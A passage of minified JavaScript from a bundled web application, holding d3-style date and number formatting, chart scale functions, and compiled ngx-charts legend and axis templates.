i?(t.W=+i[0],e+i[0].length):-1}function TU(t,a,e){var i=Ks.exec(a.slice(e,e+4));return i?(t.y=+i[0],e+i[0].length):-1}function EU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.y=+i[0]+(+i[0]>68?1900:2e3),e+i[0].length):-1}function LAe(t,a,e){var i=/^(Z)|([+-]\d\d)(?::?(\d\d))?/.exec(a.slice(e,e+6));return i?(t.Z=i[1]?0:-(i[2]+(i[3]||"00")),e+i[0].length):-1}function zAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.q=3*i[0]-3,e+i[0].length):-1}function WAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.m=i[0]-1,e+i[0].length):-1}function DU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.d=+i[0],e+i[0].length):-1}function FAe(t,a,e){var i=Ks.exec(a.slice(e,e+3));return i?(t.m=0,t.d=+i[0],e+i[0].length):-1}function xU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.H=+i[0],e+i[0].length):-1}function VAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.M=+i[0],e+i[0].length):-1}function BAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.S=+i[0],e+i[0].length):-1}function HAe(t,a,e){var i=Ks.exec(a.slice(e,e+3));return i?(t.L=+i[0],e+i[0].length):-1}function UAe(t,a,e){var i=Ks.exec(a.slice(e,e+6));return i?(t.L=Math.floor(i[0]/1e3),e+i[0].length):-1}function qAe(t,a,e){var i=wAe.exec(a.slice(e,e+1));return i?e+i[0].length:-1}function GAe(t,a,e){var i=Ks.exec(a.slice(e));return i?(t.Q=+i[0],e+i[0].length):-1}function jAe(t,a,e){var i=Ks.exec(a.slice(e));return i?(t.s=+i[0],e+i[0].length):-1}function wU(t,a){return No(t.getDate(),a,2)}function QAe(t,a){return No(t.getHours(),a,2)}function $Ae(t,a){return No(t.getHours()%12||12,a,2)}function KAe(t,a){return No(1+eT.count(Sg(t),t),a,3)}function IU(t,a){return No(t.getMilliseconds(),a,3)}function XAe(t,a){return IU(t,a)+"000"}function YAe(t,a){return No(t.getMonth()+1,a,2)}function JAe(t,a){return No(t.getMinutes(),a,2)}function ZAe(t,a){return No(t.getSeconds(),a,2)}function eTe(t){var a=t.getDay();return 0===a?7:a}function tTe(t,a){return No(tT.count(Sg(t)-1,t),a,2)}function RU(t){var a=t.getDay();return a>=4||0===a?a2(t):a2.ceil(t)}function iTe(t,a){return t=RU(t),No(a2.count(Sg(t),t)+(4===Sg(t).getDay()),a,2)}function aTe(t){return t.getDay()}function nTe(t,a){return No(iT.count(Sg(t)-1,t),a,2)}function oTe(t,a){return No(t.getFullYear()%100,a,2)}function rTe(t,a){return No((t=RU(t)).getFullYear()%100,a,2)}function sTe(t,a){return No(t.getFullYear()%1e4,a,4)}function cTe(t,a){var e=t.getDay();return No((t=e>=4||0===e?a2(t):a2.ceil(t)).getFullYear()%1e4,a,4)}function lTe(t){var a=t.getTimezoneOffset();return(a>0?"-":(a*=-1,"+"))+No(a/60|0,"0",2)+No(a%60,"0",2)}function SU(t,a){return No(t.getUTCDate(),a,2)}function dTe(t,a){return No(t.getUTCHours(),a,2)}function mTe(t,a){return No(t.getUTCHours()%12||12,a,2)}function uTe(t,a){return No(1+zI.count(o2(t),t),a,3)}function kU(t,a){return No(t.getUTCMilliseconds(),a,3)}function hTe(t,a){return kU(t,a)+"000"}function fTe(t,a){return No(t.getUTCMonth()+1,a,2)}function pTe(t,a){return No(t.getUTCMinutes(),a,2)}function _Te(t,a){return No(t.getUTCSeconds(),a,2)}function gTe(t){var a=t.getUTCDay();return 0===a?7:a}function CTe(t,a){return No(WI.count(o2(t)-1,t),a,2)}function PU(t){var a=t.getUTCDay();return a>=4||0===a?n2(t):n2.ceil(t)}function yTe(t,a){return t=PU(t),No(n2.count(o2(t),t)+(4===o2(t).getUTCDay()),a,2)}function bTe(t){return t.getUTCDay()}function MTe(t,a){return No(aT.count(o2(t)-1,t),a,2)}function vTe(t,a){return No(t.getUTCFullYear()%100,a,2)}function ATe(t,a){return No((t=PU(t)).getUTCFullYear()%100,a,2)}function TTe(t,a){return No(t.getUTCFullYear()%1e4,a,4)}function ETe(t,a){var e=t.getUTCDay();return No((t=e>=4||0===e?n2(t):n2.ceil(t)).getUTCFullYear()%1e4,a,4)}function DTe(){return"+0000"}function OU(){return"%"}function NU(t){return+t}function LU(t){return Math.floor(+t/1e3)}function WU(t){return null===t?NaN:+t}!function RTe(t){(function xAe(t){var a=t.dateTime,e=t.date,i=t.time,n=t.periods,r=t.days,c=t.shortDays,d=t.months,T=t.shortMonths,k=Fb(n),q=Vb(n),Y=Fb(r),te=Vb(r),pe=Fb(c),Re=Vb(c),Fe=Fb(d),Ne=Vb(d),et=Fb(T),ut=Vb(T),Ze={a:function Pi(Li){return c[Li.getDay()]},A:function Oi(Li){return r[Li.getDay()]},b:function $i(Li){return T[Li.getMonth()]},B:function Na(Li){return d[Li.getMonth()]},c:null,d:wU,e:wU,f:XAe,g:rTe,G:cTe,H:QAe,I:$Ae,j:KAe,L:IU,m:YAe,M:JAe,p:function jn(Li){return n[+(Li.getHours()>=12)]},q:function yn(Li){return 1+~~(Li.getMonth()/3)},Q:NU,s:LU,S:ZAe,u:eTe,U:tTe,V:iTe,w:aTe,W:nTe,x:null,X:null,y:oTe,Y:sTe,Z:lTe,"%":OU},yt={a:function Kr(Li){return c[Li.getUTCDay()]},A:function to(Li){return r[Li.getUTCDay()]},b:function ol(Li){return T[Li.getUTCMonth()]},B:function Nl(Li){return d[Li.getUTCMonth()]},c:null,d:SU,e:SU,f:hTe,g:ATe,G:ETe,H:dTe,I:mTe,j:uTe,L:kU,m:fTe,M:pTe,p:function bn(Li){return n[+(Li.getUTCHours()>=12)]},q:function Xr(Li){return 1+~~(Li.getUTCMonth()/3)},Q:NU,s:LU,S:_Te,u:gTe,U:CTe,V:yTe,w:bTe,W:MTe,x:null,X:null,y:vTe,Y:TTe,Z:DTe,"%":OU},It={a:function vi(Li,Fa,Fn){var Si=pe.exec(Fa.slice(Fn));return Si?(Li.w=Re.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},A:function xi(Li,Fa,Fn){var Si=Y.exec(Fa.slice(Fn));return Si?(Li.w=te.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},b:function Za(Li,Fa,Fn){var Si=et.exec(Fa.slice(Fn));return Si?(Li.m=ut.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},B:function wa(Li,Fa,Fn){var Si=Fe.exec(Fa.slice(Fn));return Si?(Li.m=Ne.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},c:function en(Li,Fa,Fn){return oi(Li,a,Fa,Fn)},d:DU,e:DU,f:UAe,g:EU,G:TU,H:xU,I:xU,j:FAe,L:HAe,m:WAe,M:VAe,p:function Ai(Li,Fa,Fn){var Si=k.exec(Fa.slice(Fn));return Si?(Li.p=q.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},q:zAe,Q:GAe,s:jAe,S:BAe,u:kAe,U:PAe,V:OAe,w:SAe,W:NAe,x:function Vo(Li,Fa,Fn){return oi(Li,e,Fa,Fn)},X:function Di(Li,Fa,Fn){return oi(Li,i,Fa,Fn)},y:EU,Y:TU,Z:LAe,"%":qAe};function St(Li,Fa){return function(Fn){var sl,fn,Jr,Si=[],Yr=-1,Zo=0,rl=Li.length;for(Fn instanceof Date||(Fn=new Date(+Fn));++Yr<rl;)37===Li.charCodeAt(Yr)&&(Si.push(Li.slice(Zo,Yr)),null!=(fn=AU[sl=Li.charAt(++Yr)])?sl=Li.charAt(++Yr):fn="e"===sl?" ":"0",(Jr=Fa[sl])&&(sl=Jr(Fn,fn)),Si.push(sl),Zo=Yr+1);return Si.push(Li.slice(Zo,Yr)),Si.join("")}}function Nt(Li,Fa){return function(Fn){var Zo,rl,Si=Wb(1900,void 0,1);if(oi(Si,Li,Fn+="",0)!=Fn.length)return null;if("Q"in Si)return new Date(Si.Q);if("s"in Si)return new Date(1e3*Si.s+("L"in Si?Si.L:0));if(Fa&&!("Z"in Si)&&(Si.Z=0),"p"in Si&&(Si.H=Si.H%12+12*Si.p),void 0===Si.m&&(Si.m="q"in Si?Si.q:0),"V"in Si){if(Si.V<1||Si.V>53)return null;"w"in Si||(Si.w=1),"Z"in Si?(rl=(Zo=BI(Wb(Si.y,0,1))).getUTCDay(),Zo=rl>4||0===rl?aT.ceil(Zo):aT(Zo),Zo=zI.offset(Zo,7*(Si.V-1)),Si.y=Zo.getUTCFullYear(),Si.m=Zo.getUTCMonth(),Si.d=Zo.getUTCDate()+(Si.w+6)%7):(rl=(Zo=VI(Wb(Si.y,0,1))).getDay(),Zo=rl>4||0===rl?iT.ceil(Zo):iT(Zo),Zo=eT.offset(Zo,7*(Si.V-1)),Si.y=Zo.getFullYear(),Si.m=Zo.getMonth(),Si.d=Zo.getDate()+(Si.w+6)%7)}else("W"in Si||"U"in Si)&&("w"in Si||(Si.w="u"in Si?Si.u%7:"W"in Si?1:0),rl="Z"in Si?BI(Wb(Si.y,0,1)).getUTCDay():VI(Wb(Si.y,0,1)).getDay(),Si.m=0,Si.d="W"in Si?(Si.w+6)%7+7*Si.W-(rl+5)%7:Si.w+7*Si.U-(rl+6)%7);return"Z"in Si?(Si.H+=Si.Z/100|0,Si.M+=Si.Z%100,BI(Si)):VI(Si)}}function oi(Li,Fa,Fn,Si){for(var sl,fn,Yr=0,Zo=Fa.length,rl=Fn.length;Yr<Zo;){if(Si>=rl)return-1;if(37===(sl=Fa.charCodeAt(Yr++))){if(sl=Fa.charAt(Yr++),!(fn=It[sl in AU?Fa.charAt(Yr++):sl])||(Si=fn(Li,Fn,Si))<0)return-1}else if(sl!=Fn.charCodeAt(Si++))return-1}return Si}return Ze.x=St(e,Ze),Ze.X=St(i,Ze),Ze.c=St(a,Ze),yt.x=St(e,yt),yt.X=St(i,yt),yt.c=St(a,yt),{format:function(Li){var Fa=St(Li+="",Ze);return Fa.toString=function(){return Li},Fa},parse:function(Li){var Fa=Nt(Li+="",!1);return Fa.toString=function(){return Li},Fa},utcFormat:function(Li){var Fa=St(Li+="",yt);return Fa.toString=function(){return Li},Fa},utcParse:function(Li){var Fa=Nt(Li+="",!0);return Fa.toString=function(){return Li},Fa}}})(t)}({dateTime:"%x, %X",date:"%-m/%-d/%Y",time:"%-I:%M:%S %p",periods:["AM","PM"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],shortDays:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]});const STe=xI(DI).right,VU=(xI(WU),STe);function kTe(t,a){return t=+t,a=+a,function(e){return Math.round(t*(1-e)+a*e)}}function OTe(t){return+t}var BU=[0,1];function s2(t){return t}function HI(t,a){return(a-=t=+t)?function(e){return(e-t)/a}:function PTe(t){return function(){return t}}(isNaN(a)?NaN:.5)}function LTe(t,a,e){var i=t[0],n=t[1],r=a[0],c=a[1];return n<i?(i=HI(n,i),r=e(c,r)):(i=HI(i,n),r=e(r,c)),function(d){return r(i(d))}}function zTe(t,a,e){var i=Math.min(t.length,a.length)-1,n=new Array(i),r=new Array(i),c=-1;for(t[i]<t[0]&&(t=t.slice().reverse(),a=a.slice().reverse());++c<i;)n[c]=HI(t[c],t[c+1]),r[c]=e(a[c],a[c+1]);return function(d){var T=VU(t,d,1,i)-1;return r[T](n[T](d))}}function HU(t,a){return a.domain(t.domain()).range(t.range()).interpolate(t.interpolate()).clamp(t.clamp()).unknown(t.unknown())}function UU(){return function WTe(){var i,n,r,d,T,k,t=BU,a=BU,e=HA,c=s2;function q(){var te=Math.min(t.length,a.length);return c!==s2&&(c=function NTe(t,a){var e;return t>a&&(e=t,t=a,a=e),function(i){return Math.max(t,Math.min(a,i))}}(t[0],t[te-1])),d=te>2?zTe:LTe,T=k=null,Y}function Y(te){return null==te||isNaN(te=+te)?r:(T||(T=d(t.map(i),a,e)))(i(c(te)))}return Y.invert=function(te){return c(n((k||(k=d(a,t.map(i),Rm)))(te)))},Y.domain=function(te){return arguments.length?(t=Array.from(te,OTe),q()):t.slice()},Y.range=function(te){return arguments.length?(a=Array.from(te),q()):a.slice()},Y.rangeRound=function(te){return a=Array.from(te),e=kTe,q()},Y.clamp=function(te){return arguments.length?(c=!!te||s2,q()):c!==s2},Y.interpolate=function(te){return arguments.length?(e=te,q()):e},Y.unknown=function(te){return arguments.length?(r=te,Y):r},function(te,pe){return i=te,n=pe,q()}}()(s2,s2)}function Bb(t,a){switch(arguments.length){case 0:break;case 1:this.range(t);break;default:this.range(a).domain(t)}return this}var GU,UTe=/^(?:(.)?([<>=^]))?([+\-( ])?([$#])?(0)?(\d+)?(,)?(\.\d+)?(~)?([a-z%])?$/i;function nT(t){if(!(a=UTe.exec(t)))throw new Error("invalid format: "+t);var a;return new UI({fill:a[1],align:a[2],sign:a[3],symbol:a[4],zero:a[5],width:a[6],comma:a[7],precision:a[8]&&a[8].slice(1),trim:a[9],type:a[10]})}function UI(t){this.fill=void 0===t.fill?" ":t.fill+"",this.align=void 0===t.align?">":t.align+"",this.sign=void 0===t.sign?"-":t.sign+"",this.symbol=void 0===t.symbol?"":t.symbol+"",this.zero=!!t.zero,this.width=void 0===t.width?void 0:+t.width,this.comma=!!t.comma,this.precision=void 0===t.precision?void 0:+t.precision,this.trim=!!t.trim,this.type=void 0===t.type?"":t.type+""}function oT(t,a){if((e=(t=a?t.toExponential(a-1):t.toExponential()).indexOf("e"))<0)return null;var e,i=t.slice(0,e);return[i.length>1?i[0]+i.slice(2):i,+t.slice(e+1)]}function c2(t){return(t=oT(Math.abs(t)))?t[1]:NaN}function jU(t,a){var e=oT(t,a);if(!e)return t+"";var i=e[0],n=e[1];return n<0?"0."+new Array(-n).join("0")+i:i.length>n+1?i.slice(0,n+1)+"."+i.slice(n+1):i+new Array(n-i.length+2).join("0")}nT.prototype=UI.prototype,UI.prototype.toString=function(){return this.fill+this.align+this.sign+this.symbol+(this.zero?"0":"")+(void 0===this.width?"":Math.max(1,0|this.width))+(this.comma?",":"")+(void 0===this.precision?"":"."+Math.max(0,0|this.precision))+(this.trim?"~":"")+this.type};const QU={"%":(t,a)=>(100*t).toFixed(a),b:t=>Math.round(t).toString(2),c:t=>t+"",d:function qTe(t){return Math.abs(t=Math.round(t))>=1e21?t.toLocaleString("en").replace(/,/g,""):t.toString(10)},e:(t,a)=>t.toExponential(a),f:(t,a)=>t.toFixed(a),g:(t,a)=>t.toPrecision(a),o:t=>Math.round(t).toString(8),p:(t,a)=>jU(100*t,a),r:jU,s:function KTe(t,a){var e=oT(t,a);if(!e)return t+"";var i=e[0],n=e[1],r=n-(GU=3*Math.max(-8,Math.min(8,Math.floor(n/3))))+1,c=i.length;return r===c?i:r>c?i+new Array(r-c+1).join("0"):r>0?i.slice(0,r)+"."+i.slice(r):"0."+new Array(1-r).join("0")+oT(t,Math.max(0,a+r-1))[0]},X:t=>Math.round(t).toString(16).toUpperCase(),x:t=>Math.round(t).toString(16)};function $U(t){return t}var rT,YU,JU,KU=Array.prototype.map,XU=["y","z","a","f","p","n","\xb5","m","","k","M","G","T","P","E","Z","Y"];function tEe(t){var a=t.domain;return t.ticks=function(e){var i=a();return function uAe(t,a,e){var i,r,c,d,n=-1;if(e=+e,(t=+t)==(a=+a)&&e>0)return[t];if((i=a<t)&&(r=t,t=a,a=r),0===(d=cU(t,a,e))||!isFinite(d))return[];if(d>0){let T=Math.round(t/d),k=Math.round(a/d);for(T*d<t&&++T,k*d>a&&--k,c=new Array(r=k-T+1);++n<r;)c[n]=(T+n)*d}else{d=-d;let T=Math.round(t*d),k=Math.round(a*d);for(T/d<t&&++T,k/d>a&&--k,c=new Array(r=k-T+1);++n<r;)c[n]=(T+n)/d}return i&&c.reverse(),c}(i[0],i[i.length-1],null==e?10:e)},t.tickFormat=function(e,i){var n=a();return function eEe(t,a,e,i){var r,n=SI(t,a,e);switch((i=nT(null==i?",f":i)).type){case"s":var c=Math.max(Math.abs(t),Math.abs(a));return null==i.precision&&!isNaN(r=function GTe(t,a){return Math.max(0,3*Math.max(-8,Math.min(8,Math.floor(c2(a)/3)))-c2(Math.abs(t)))}(n,c))&&(i.precision=r),JU(i,c);case"":case"e":case"g":case"p":case"r":null==i.precision&&!isNaN(r=function JTe(t,a){return t=Math.abs(t),a=Math.abs(a)-t,Math.max(0,c2(a)-c2(t))+1}(n,Math.max(Math.abs(t),Math.abs(a))))&&(i.precision=r-("e"===i.type));break;case"f":case"%":null==i.precision&&!isNaN(r=function ZTe(t){return Math.max(0,-c2(Math.abs(t)))}(n))&&(i.precision=r-2*("%"===i.type))}return YU(i)}(n[0],n[n.length-1],null==e?10:e,i)},t.nice=function(e){null==e&&(e=10);var T,k,i=a(),n=0,r=i.length-1,c=i[n],d=i[r],q=10;for(d<c&&(k=c,c=d,d=k,k=n,n=r,r=k);q-- >0;){if((k=cU(c,d,e))===T)return i[n]=c,i[r]=d,a(i);if(k>0)c=Math.floor(c/k)*k,d=Math.ceil(d/k)*k;else{if(!(k<0))break;c=Math.ceil(c*k)/k,d=Math.floor(d*k)/k}T=k}return t},t}function l2(){var t=UU();return t.copy=function(){return HU(t,l2())},Bb.apply(t,arguments),tEe(t)}function ZU(t,a,e){t=+t,a=+a,e=(n=arguments.length)<2?(a=t,t=0,1):n<3?1:+e;for(var i=-1,n=0|Math.max(0,Math.ceil((a-t)/e)),r=new Array(n);++i<n;)r[i]=t+i*e;return r}!function YTe(t){rT=function XTe(t){var a=void 0===t.grouping||void 0===t.thousands?$U:function jTe(t,a){return function(e,i){for(var n=e.length,r=[],c=0,d=t[0],T=0;n>0&&d>0&&(T+d+1>i&&(d=Math.max(1,i-T)),r.push(e.substring(n-=d,n+d)),!((T+=d+1)>i));)d=t[c=(c+1)%t.length];return r.reverse().join(a)}}(KU.call(t.grouping,Number),t.thousands+""),e=void 0===t.currency?"":t.currency[0]+"",i=void 0===t.currency?"":t.currency[1]+"",n=void 0===t.decimal?".":t.decimal+"",r=void 0===t.numerals?$U:function QTe(t){return function(a){return a.replace(/[0-9]/g,function(e){return t[+e]})}}(KU.call(t.numerals,String)),c=void 0===t.percent?"%":t.percent+"",d=void 0===t.minus?"\u2212":t.minus+"",T=void 0===t.nan?"NaN":t.nan+"";function k(Y){var te=(Y=nT(Y)).fill,pe=Y.align,Re=Y.sign,Fe=Y.symbol,Ne=Y.zero,et=Y.width,ut=Y.comma,Ze=Y.precision,yt=Y.trim,It=Y.type;"n"===It?(ut=!0,It="g"):QU[It]||(void 0===Ze&&(Ze=12),yt=!0,It="g"),(Ne||"0"===te&&"="===pe)&&(Ne=!0,te="0",pe="=");var St="$"===Fe?e:"#"===Fe&&/[boxX]/.test(It)?"0"+It.toLowerCase():"",Nt="$"===Fe?i:/[%p]/.test(It)?c:"",oi=QU[It],Ai=/[defgprs%]/.test(It);function vi(xi){var en,Vo,Di,Za=St,wa=Nt;if("c"===It)wa=oi(xi)+wa,xi="";else{var Pi=(xi=+xi)<0||1/xi<0;if(xi=isNaN(xi)?T:oi(Math.abs(xi),Ze),yt&&(xi=function $Te(t){e:for(var n,a=t.length,e=1,i=-1;e<a;++e)switch(t[e]){case".":i=n=e;break;case"0":0===i&&(i=e),n=e;break;default:if(!+t[e])break e;i>0&&(i=0)}return i>0?t.slice(0,i)+t.slice(n+1):t}(xi)),Pi&&0==+xi&&"+"!==Re&&(Pi=!1),Za=(Pi?"("===Re?Re:d:"-"===Re||"("===Re?"":Re)+Za,wa=("s"===It?XU[8+GU/3]:"")+wa+(Pi&&"("===Re?")":""),Ai)for(en=-1,Vo=xi.length;++en<Vo;)if(48>(Di=xi.charCodeAt(en))||Di>57){wa=(46===Di?n+xi.slice(en+1):xi.slice(en))+wa,xi=xi.slice(0,en);break}}ut&&!Ne&&(xi=a(xi,1/0));var Oi=Za.length+xi.length+wa.length,$i=Oi<et?new Array(et-Oi+1).join(te):"";switch(ut&&Ne&&(xi=a($i+xi,$i.length?et-wa.length:1/0),$i=""),pe){case"<":xi=Za+xi+wa+$i;break;case"=":xi=Za+$i+xi+wa;break;case"^":xi=$i.slice(0,Oi=$i.length>>1)+Za+xi+wa+$i.slice(Oi);break;default:xi=$i+Za+xi+wa}return r(xi)}return Ze=void 0===Ze?6:/[gprs]/.test(It)?Math.max(1,Math.min(21,Ze)):Math.max(0,Math.min(20,Ze)),vi.toString=function(){return Y+""},vi}return{format:k,formatPrefix:function q(Y,te){var pe=k(((Y=nT(Y)).type="f",Y)),Re=3*Math.max(-8,Math.min(8,Math.floor(c2(te)/3))),Fe=Math.pow(10,-Re),Ne=XU[8+Re/3];return function(et){return pe(Fe*et)+Ne}}}}(t),YU=rT.format,JU=rT.formatPrefix}({thousands:",",grouping:[3],currency:["$",""]});const eq=Symbol("implicit");function qI(){var t=new Map,a=[],e=[],i=eq;function n(r){var c=r+"",d=t.get(c);if(!d){if(i!==eq)return i;t.set(c,d=a.push(r))}return e[(d-1)%e.length]}return n.domain=function(r){if(!arguments.length)return a.slice();a=[],t=new Map;for(const c of r){const d=c+"";t.has(d)||t.set(d,a.push(c))}return n},n.range=function(r){return arguments.length?(e=Array.from(r),n):e.slice()},n.unknown=function(r){return arguments.length?(i=r,n):i},n.copy=function(){return qI(a,e).unknown(i)},Bb.apply(n,arguments),n}function sT(){var r,c,t=qI().unknown(void 0),a=t.domain,e=t.range,i=0,n=1,d=!1,T=0,k=0,q=.5;function Y(){var te=a().length,pe=n<i,Re=pe?n:i,Fe=pe?i:n;r=(Fe-Re)/Math.max(1,te-T+2*k),d&&(r=Math.floor(r)),Re+=(Fe-Re-r*(te-T))*q,c=r*(1-T),d&&(Re=Math.round(Re),c=Math.round(c));var Ne=ZU(te).map(function(et){return Re+r*et});return e(pe?Ne.reverse():Ne)}return delete t.unknown,t.domain=function(te){return arguments.length?(a(te),Y()):a()},t.range=function(te){return arguments.length?([i,n]=te,i=+i,n=+n,Y()):[i,n]},t.rangeRound=function(te){return[i,n]=te,i=+i,n=+n,d=!0,Y()},t.bandwidth=function(){return c},t.step=function(){return r},t.round=function(te){return arguments.length?(d=!!te,Y()):d},t.padding=function(te){return arguments.length?(T=Math.min(1,k=+te),Y()):T},t.paddingInner=function(te){return arguments.length?(T=Math.min(1,te),Y()):T},t.paddingOuter=function(te){return arguments.length?(k=+te,Y()):k},t.align=function(te){return arguments.length?(q=Math.max(0,Math.min(1,te)),Y()):q},t.copy=function(){return sT(a(),[i,n]).round(d).paddingInner(T).paddingOuter(k).align(q)},Bb.apply(Y(),arguments)}function aEe(t,a,e=WU){if(i=t.length){if((a=+a)<=0||i<2)return+e(t[0],0,t);if(a>=1)return+e(t[i-1],i-1,t);var i,n=(i-1)*a,r=Math.floor(n),c=+e(t[r],r,t);return c+(+e(t[r+1],r+1,t)-c)*(n-r)}}function iq(){var i,t=[],a=[],e=[];function n(){var c=0,d=Math.max(1,a.length);for(e=new Array(d-1);++c<d;)e[c-1]=aEe(t,c/d);return r}function r(c){return null==c||isNaN(c=+c)?i:a[VU(e,c)]}return r.invertExtent=function(c){var d=a.indexOf(c);return d<0?[NaN,NaN]:[d>0?e[d-1]:t[0],d<e.length?e[d]:t[t.length-1]]},r.domain=function(c){if(!arguments.length)return t.slice();t=[];for(let d of c)null!=d&&!isNaN(d=+d)&&t.push(d);return t.sort(DI),n()},r.range=function(c){return arguments.length?(a=Array.from(c),n()):a.slice()},r.unknown=function(c){return arguments.length?(i=c,r):i},r.quantiles=function(){return e.slice()},r.copy=function(){return iq().domain(t).range(a).unknown(i)},Bb.apply(r,arguments)}de(4730);const nEe=["caretElm"];function oEe(t,a){}const rEe=function(t){return{model:t}};function sEe(t,a){if(1&t&&(m(0,"span"),ne(1,oEe,0,0,"ng-template",5),u()),2&t){const e=B();C(1),V("ngTemplateOutlet",e.template)("ngTemplateOutletContext",fr(2,rEe,e.context))}}function cEe(t,a){1&t&&it(0,"span",6),2&t&&V("innerHTML",B().title,Uc)}function lEe(t,a){if(1&t&&(m(0,"header",4)(1,"span",5),s(2),u()()),2&t){const e=B();C(2),ke(e.title)}}function dEe(t,a){if(1&t){const e=Ye();m(0,"li",6)(1,"ngx-charts-legend-entry",7),he("select",function(n){return be(e),Me(B().labelClick.emit(n))})("activate",function(n){return be(e),Me(B().activate(n))})("deactivate",function(n){return be(e),Me(B().deactivate(n))}),u()()}if(2&t){const e=a.$implicit,i=B();C(1),V("label",e.label)("formattedLabel",e.formattedLabel)("color",e.color)("isActive",i.isActive(e))}}function mEe(t,a){if(1&t&&(fi(),ln(),it(0,"ngx-charts-scale-legend",4)),2&t){const e=B();V("horizontal",e.legendOptions&&e.legendOptions.position===e.LegendPosition.Below)("valueRange",e.legendOptions.domain)("colors",e.legendOptions.colors)("height",e.view[1])("width",e.legendWidth)}}function uEe(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"ngx-charts-legend",5),he("labelClick",function(n){return be(e),Me(B().legendLabelClick.emit(n))})("labelActivate",function(n){return be(e),Me(B().legendLabelActivate.emit(n))})("labelDeactivate",function(n){return be(e),Me(B().legendLabelDeactivate.emit(n))}),u()}if(2&t){const e=B();V("horizontal",e.legendOptions&&e.legendOptions.position===e.LegendPosition.Below)("data",e.legendOptions.domain)("title",e.legendOptions.title)("colors",e.legendOptions.colors)("height",e.view[1])("width",e.legendWidth)("activeEntries",e.activeEntries)}}const aq=["*"],hEe=["ngx-charts-axis-label",""],nq=["ticksel"],fEe=["ngx-charts-x-axis-ticks",""];function pEe(t,a){if(1&t&&(fi(),m(0,"g",3)(1,"title"),s(2),u(),m(3,"text",4),s(4),u()()),2&t){const e=a.$implicit,i=B();Rt("transform",i.tickTransform(e)),C(2),ke(i.tickFormat(e)),C(1),ri("font-size","12px"),Rt("text-anchor",i.textAnchor)("transform",i.textTransform),C(1),ct(" ",i.tickTrim(i.tickFormat(e))," ")}}function _Ee(t,a){if(1&t&&(fi(),m(0,"g"),it(1,"line",6),u()),2&t){const e=B(2);Rt("transform",e.gridLineTransform()),C(1),Rt("y1",-e.gridLineHeight)}}function gEe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,_Ee,2,2,"g",5),u()),2&t){const e=a.$implicit,i=B();Rt("transform",i.tickTransform(e)),C(1),V("ngIf",i.showGridLines)}}const CEe=["ngx-charts-x-axis",""];function yEe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("dimensionsChanged",function(n){return be(e),Me(B().emitTicksHeight(n))}),u()}if(2&t){const e=B();V("trimTicks",e.trimTicks)("rotateTicks",e.rotateTicks)("maxTickLength",e.maxTickLength)("tickFormatting",e.tickFormatting)("tickArguments",e.tickArguments)("tickStroke",e.tickStroke)("scale",e.xScale)("orient",e.xOrient)("showGridLines",e.showGridLines)("gridLineHeight",e.dims.height)("width",e.dims.width)("tickValues",e.ticks)}}function bEe(t,a){if(1&t&&(fi(),it(0,"g",3)),2&t){const e=B();V("label",e.labelText)("offset",e.labelOffset)("orient",e.orientation.Bottom)("height",e.dims.height)("width",e.dims.width)}}const MEe=["ngx-charts-y-axis-ticks",""];function vEe(t,a){if(1&t&&(fi(),m(0,"g",4)(1,"title"),s(2),u(),m(3,"text",5),s(4),u()()),2&t){const e=a.$implicit,i=B();Rt("transform",i.transform(e)),C(2),ke(i.tickFormat(e)),C(1),ri("font-size","12px"),Rt("dy",i.dy)("x",i.x1)("y",i.y1)("text-anchor",i.textAnchor),C(1),ct(" ",i.tickTrim(i.tickFormat(e))," ")}}function AEe(t,a){if(1&t&&(fi(),it(0,"path",6)),2&t){const e=B();Rt("d",e.referenceAreaPath)("transform",e.gridLineTransform())}}function TEe(t,a){1&t&&(fi(),it(0,"line",9)),2&t&&Rt("x2",B(3).gridLineWidth)}function EEe(t,a){1&t&&(fi(),it(0,"line",9)),2&t&&Rt("x2",-B(3).gridLineWidth)}function DEe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,TEe,1,1,"line",8),ne(2,EEe,1,1,"line",8),u()),2&t){const e=B(2);Rt("transform",e.gridLineTransform()),C(1),V("ngIf",e.orient===e.Orientation.Left),C(1),V("ngIf",e.orient===e.Orientation.Right)}}function xEe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,DEe,3,3,"g",7),u()),2&t){const e=a.$implicit,i=B();Rt("transform",i.transform(e)),C(1),V("ngIf",i.showGridLines)}}function wEe(t,a){if(1&t&&(fi(),m(0,"g")(1,"title"),s(2),u(),m(3,"text",11),s(4),u()()),2&t){const e=B(2).$implicit,i=B();C(2),ke(i.tickTrim(i.tickFormat(e.value))),C(1),Rt("dy",i.dy)("y",-6)("x",i.gridLineWidth)("text-anchor",i.textAnchor),C(1),ct(" ",e.name," ")}}function IEe(t,a){if(1&t&&(fi(),m(0,"g"),it(1,"line",10),ne(2,wEe,5,6,"g",7),u()),2&t){const e=B().$implicit,i=B();Rt("transform",i.transform(e.value)),C(1),Rt("x2",i.gridLineWidth)("transform",i.gridLineTransform()),C(1),V("ngIf",i.showRefLabels)}}function REe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,IEe,3,4,"g",7),u()),2&t){const e=B();C(1),V("ngIf",e.showRefLines)}}const SEe=["ngx-charts-y-axis",""];function kEe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("dimensionsChanged",function(n){return be(e),Me(B().emitTicksWidth(n))}),u()}if(2&t){const 